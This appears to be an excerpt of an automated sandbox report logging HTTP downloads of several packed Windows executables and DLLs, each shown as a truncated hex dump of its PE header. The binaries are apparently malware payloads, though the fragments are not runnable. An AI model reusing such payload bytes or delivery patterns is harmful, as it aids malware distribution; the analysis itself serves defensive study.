00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:45 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Sat, 01 Feb 2025 16:11:09 GMTConnection: keep-aliveETag: "679e479d-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 47 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 85 12 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 48 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:50 GMTContent-Type: application/octet-streamContent-Length: 3024384Last-Modified: Sat, 01 Feb 2025 16:14:01 GMTConnection: keep-aliveETag: "679e4849-2e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 2c 29 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b5 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 69 68 70 78 6a 79 75 00 10 2b 00 00 b0 06 00 00 0a 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 75 69 7a 65 61 74 00 10 00 00 00 c0 31 00 00 06 00 00 00 fe 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 04 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:53 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Fri, 31 Jan 2025 09:36:52 GMTConnection: keep-aliveETag: "679c99b4-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:55 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Sat, 01 Feb 2025 16:13:50 GMTConnection: keep-aliveETag: "679e483e-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 e0 6f 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 78 6b 79 68 78 75 77 00 30 1a 00 00 b0 4f 00 00 26 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 64 65 79 74 74 6f 6e 00 10 00 00 00 e0 69 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:59 GMTContent-Type: application/octet-streamContent-Length: 1882112Last-Modified: Sat, 01 Feb 2025 15:46:49 GMTConnection: keep-aliveETag: "679e41e9-1cb800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 80 bc 97 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d4 02 00 00 6e 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 77 a9 1d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 dc d8 4a 00 57 00 00 00 56 40 04 00 6a 00 00 00 00 30 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 04 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 04 00 00 10 00 00 00 dc 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 0c 04 00 00 00 30 04 00 00 04 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 04 00 00 02 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2b 00 00 50 04 00 00 02 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 72 62 75 65 63 79 62 00 a0 1a 00 00 40 30 00 00 9e 1a 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 73 70 70 6e 64 6d 61 00 10 00 00 00 e0 4a 00 00 04 00 00 00 92 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 96 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:59 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:19:00 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 